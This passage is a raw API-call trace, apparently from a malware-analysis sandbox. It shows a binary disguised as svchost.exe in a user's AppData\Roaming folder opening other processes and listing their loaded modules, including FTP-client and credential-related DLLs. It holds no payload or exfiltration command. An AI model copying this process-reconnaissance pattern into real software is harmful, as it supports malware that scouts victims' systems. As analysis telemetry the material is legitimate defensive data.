nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Portable Devices\\miss-single-speech.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\miss-single-speech.exe")) returned 0x46 [0072.367] CoTaskMemFree (pv=0xd956b0) [0072.368] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2472e70, cb=0x18 | out: lpmodinfo=0x2472e70*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0072.368] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.368] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0072.368] CoTaskMemFree (pv=0xd956b0) [0072.368] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.368] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0072.369] CoTaskMemFree (pv=0xd956b0) [0072.369] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2475030, cb=0x18 | out: lpmodinfo=0x2475030*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0072.370] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.370] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0072.370] CoTaskMemFree (pv=0xd956b0) [0072.370] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.370] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0072.371] CoTaskMemFree (pv=0xd956b0) [0072.371] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24771f0, cb=0x18 | out: lpmodinfo=0x24771f0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0072.371] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.372] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0072.372] CoTaskMemFree (pv=0xd956b0) [0072.372] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.372] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0072.373] CoTaskMemFree (pv=0xd956b0) [0072.373] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24793c0, cb=0x18 | out: lpmodinfo=0x24793c0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0072.374] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.374] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0072.374] CoTaskMemFree (pv=0xd956b0) [0072.375] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.375] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0072.375] CoTaskMemFree (pv=0xd956b0) [0072.375] CloseHandle (hObject=0x214) returned 1 [0072.377] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0072.377] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb40) returned 0x214 [0072.377] EnumProcessModules (in: hProcess=0x214, lphModule=0x247bae0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x247bae0, lpcbNeeded=0x23ee40) returned 1 [0072.378] GetModuleInformation (in: hProcess=0x214, hModule=0xaa0000, lpmodinfo=0x247bd50, cb=0x18 | out: lpmodinfo=0x247bd50*(lpBaseOfDll=0xaa0000, SizeOfImage=0x17000, EntryPoint=0xaa14a1)) returned 1 [0072.378] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.378] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xaa0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="coreftp.exe") returned 0xb [0072.378] CoTaskMemFree (pv=0xd956b0) [0072.378] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.378] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xaa0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Uninstall Information\\coreftp.exe" (normalized: "c:\\program files\\uninstall information\\coreftp.exe")) returned 0x32 [0072.379] CoTaskMemFree (pv=0xd956b0) [0072.379] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x247df70, cb=0x18 | out: lpmodinfo=0x247df70*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0072.379] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.379] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0072.380] CoTaskMemFree (pv=0xd956b0) [0072.380] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.380] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0072.381] CoTaskMemFree (pv=0xd956b0) [0072.381] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2480130, cb=0x18 | out: lpmodinfo=0x2480130*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0072.381] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.381] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0072.382] CoTaskMemFree (pv=0xd956b0) [0072.382] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.382] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0072.382] CoTaskMemFree (pv=0xd956b0) [0072.383] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24822f0, cb=0x18 | out: lpmodinfo=0x24822f0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0072.383] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.383] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0072.384] CoTaskMemFree (pv=0xd956b0) [0072.384] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.384] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0072.385] CoTaskMemFree (pv=0xd956b0) [0072.385] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24844c0, cb=0x18 | out: lpmodinfo=0x24844c0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0072.385] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.385] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0072.386] CoTaskMemFree (pv=0xd956b0) [0072.386] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.386] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0072.387] CoTaskMemFree (pv=0xd956b0) [0072.387] CloseHandle (hObject=0x214) returned 1 [0072.388] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0072.389] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x214 [0072.389] EnumProcessModules (in: hProcess=0x214, lphModule=0x2486bf8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2486bf8, lpcbNeeded=0x23ee40) returned 1 [0072.394] EnumProcessModules (in: hProcess=0x214, lphModule=0x2486e10, cb=0x400, lpcbNeeded=0x23ee40 | out: lphModule=0x2486e10, lpcbNeeded=0x23ee40) returned 1 [0072.398] GetModuleInformation (in: hProcess=0x214, hModule=0xff760000, lpmodinfo=0x2487280, cb=0x18 | out: lpmodinfo=0x2487280*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0072.399] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.399] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff760000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0072.399] CoTaskMemFree (pv=0xd956b0) [0072.400] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.400] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff760000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0072.400] CoTaskMemFree (pv=0xd956b0) [0072.400] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2489478, cb=0x18 | out: lpmodinfo=0x2489478*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0072.400] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.400] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0072.401] CoTaskMemFree (pv=0xd956b0) [0072.401] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.401] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0072.402] CoTaskMemFree (pv=0xd956b0) [0072.402] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x248b638, cb=0x18 | out: lpmodinfo=0x248b638*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0072.402] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.402] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0072.403] CoTaskMemFree (pv=0xd956b0) [0072.403] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.403] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0072.404] CoTaskMemFree (pv=0xd956b0) [0072.404] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x248d808, cb=0x18 | out: lpmodinfo=0x248d808*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0072.404] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.404] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0072.405] CoTaskMemFree (pv=0xd956b0) [0072.405] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.405] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0072.406] CoTaskMemFree (pv=0xd956b0) [0072.406] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x248f9d8, cb=0x18 | out: lpmodinfo=0x248f9d8*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0072.406] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.406] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0072.407] CoTaskMemFree (pv=0xd956b0) [0072.407] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.407] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0072.408] CoTaskMemFree (pv=0xd956b0) [0072.408] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x2491bf0, cb=0x18 | out: lpmodinfo=0x2491bf0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0072.409] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.409] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0072.409] CoTaskMemFree (pv=0xd956b0) [0072.409] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.409] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0072.410] CoTaskMemFree (pv=0xd956b0) [0072.410] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x2493db0, cb=0x18 | out: lpmodinfo=0x2493db0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0072.411] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.411] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0072.412] CoTaskMemFree (pv=0xd956b0) [0072.412] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.412] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0072.413] CoTaskMemFree (pv=0xd956b0) [0072.413] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x2495f70, cb=0x18 | out: lpmodinfo=0x2495f70*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0072.413] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.413] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0072.414] CoTaskMemFree (pv=0xd956b0) [0072.414] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.414] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0072.415] CoTaskMemFree (pv=0xd956b0) [0072.415] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x2498130, cb=0x18 | out: lpmodinfo=0x2498130*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0072.416] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.416] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0072.417] CoTaskMemFree (pv=0xd956b0) [0072.417] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.417] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0072.419] CoTaskMemFree (pv=0xd956b0) [0072.419] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x249a388, cb=0x18 | out: lpmodinfo=0x249a388*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0072.420] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.420] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0072.421] CoTaskMemFree (pv=0xd956b0) [0072.421] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.421] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0072.422] CoTaskMemFree (pv=0xd956b0) [0072.422] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x249c548, cb=0x18 | out: lpmodinfo=0x249c548*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0072.423] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.423] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0072.424] CoTaskMemFree (pv=0xd956b0) [0072.424] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.424] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0072.425] CoTaskMemFree (pv=0xd956b0) [0072.425] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x249e6f8, cb=0x18 | out: lpmodinfo=0x249e6f8*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0072.426] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.426] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0072.427] CoTaskMemFree (pv=0xd956b0) [0072.427] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.427] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0072.429] CoTaskMemFree (pv=0xd956b0) [0072.429] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x24a08b8, cb=0x18 | out: lpmodinfo=0x24a08b8*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0072.430] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.430] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0072.431] CoTaskMemFree (pv=0xd956b0) [0072.431] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.431] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0072.432] CoTaskMemFree (pv=0xd956b0) [0072.432] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x24a2a90, cb=0x18 | out: lpmodinfo=0x24a2a90*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0072.433] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.433] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0072.435] CoTaskMemFree (pv=0xd956b0) [0072.435] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.435] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0072.436] CoTaskMemFree (pv=0xd956b0) [0072.436] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x24a4c50, cb=0x18 | out: lpmodinfo=0x24a4c50*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0072.437] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.437] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0072.439] CoTaskMemFree (pv=0xd956b0) [0072.439] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.439] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0072.440] CoTaskMemFree (pv=0xd956b0) [0072.440] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x24a6e20, cb=0x18 | out: lpmodinfo=0x24a6e20*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0072.441] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.441] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0072.443] CoTaskMemFree (pv=0xd956b0) [0072.443] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.443] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0072.444] CoTaskMemFree (pv=0xd956b0) [0072.444] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc7a0000, lpmodinfo=0x24a8ff0, cb=0x18 | out: lpmodinfo=0x24a8ff0*(lpBaseOfDll=0x7fefc7a0000, SizeOfImage=0x196000, EntryPoint=0x7fefc7a78e4)) returned 1 [0072.445] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.445] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc7a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wevtsvc.dll") returned 0xb [0072.447] CoTaskMemFree (pv=0xd956b0) [0072.447] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.447] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc7a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll")) returned 0x1f [0072.448] CoTaskMemFree (pv=0xd956b0) [0072.448] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x24ab2c8, cb=0x18 | out: lpmodinfo=0x24ab2c8*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0072.450] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.450] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0072.451] CoTaskMemFree (pv=0xd956b0) [0072.451] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.452] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0072.453] CoTaskMemFree (pv=0xd956b0) [0072.453] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x24ad498, cb=0x18 | out: lpmodinfo=0x24ad498*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0072.454] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.454] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0072.456] CoTaskMemFree (pv=0xd956b0) [0072.456] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.456] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0072.458] CoTaskMemFree (pv=0xd956b0) [0072.458] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x24af658, cb=0x18 | out: lpmodinfo=0x24af658*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0072.459] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.459] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0072.461] CoTaskMemFree (pv=0xd956b0) [0072.461] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.461] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0072.463] CoTaskMemFree (pv=0xd956b0) [0072.463] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x24b1818, cb=0x18 | out: lpmodinfo=0x24b1818*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0072.464] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.464] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0072.466] CoTaskMemFree (pv=0xd956b0) [0072.466] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.466] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0072.468] CoTaskMemFree (pv=0xd956b0) 